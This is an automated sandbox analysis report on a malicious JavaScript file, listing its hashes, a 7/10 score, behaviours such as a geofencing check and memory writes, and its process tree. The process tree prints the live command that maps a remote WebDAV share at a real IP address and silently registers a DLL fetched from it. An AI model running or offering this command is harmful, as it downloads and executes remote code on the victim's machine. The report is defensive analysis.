Resubmissions

27/07/2024, 17:08

240727-vnrrpszapr 10

24/07/2024, 13:55

240724-q8e67aygrr 10

Analysis

  • max time kernel
    139s
  • max time network
    144s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240704-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240704-enlocale:en-usos:windows10-2004-x64system
  • submitted
    27/07/2024, 17:08

General

  • Target

    40c918b435649c05c1f43a6f95c9bdb613726a86dfce987ea5ccd90ec2c911df.js

  • Size

    5KB

  • MD5

    d2f7824a9ca7ba8e47764dee6c61ac6b

  • SHA1

    b11912837f3fccb36a4cfd10c3b95175515c7a1b

  • SHA256

    40c918b435649c05c1f43a6f95c9bdb613726a86dfce987ea5ccd90ec2c911df

  • SHA512

    f1e608ff3255dc5865c69d4fd153968f054c0a408043977e01b536e46d0f1b59fc53b54ee6a55e495c3469549b22b3ff4c35c3bd452a4199db622b0d4046911f

  • SSDEEP

    96:kTdLPdO337lh7z3T4d4hut69UXG2siCCehAkx3nCwG2siCCehCGu5:kTBdc5YqnuGXiCCcAkxGXiCCcCG4

Score
7/10

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Runs net.exe
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\40c918b435649c05c1f43a6f95c9bdb613726a86dfce987ea5ccd90ec2c911df.js
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3384
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k net use \\45.9.74.36@8888\davwwwroot\ && regsvr32 /s \\45.9.74.36@8888\davwwwroot\22997363323494.dll
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3656
      • C:\Windows\system32\net.exe
        net use \\45.9.74.36@8888\davwwwroot\
        3⤵
          PID:2176

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads